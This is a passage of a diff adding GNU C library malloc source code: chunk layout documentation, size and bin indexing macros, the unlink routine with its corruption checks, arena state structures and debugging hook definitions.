+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Same, except also perform an argument and result check.  First, we check
+   that the padding done by request2size didn't result in an integer
+   overflow.  Then we check (using REQUEST_OUT_OF_RANGE) that the resulting
+   size isn't so large that a later alignment would lead to another integer
+   overflow.  */
+#define checked_request2size(req, sz) \
+({				    \
+  (sz) = request2size (req);	    \
+  if (((sz) < (req))		    \
+      || REQUEST_OUT_OF_RANGE (sz)) \
+    {				    \
+      __set_errno (ENOMEM);	    \
+      return 0;			    \
+    }				    \
+})
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr ("corrupted size vs. prev_size");			      \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr ("corrupted double-linked list");			      \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr ("corrupted double-linked list (not small)");   \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given it's sole purpose is to reduce number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
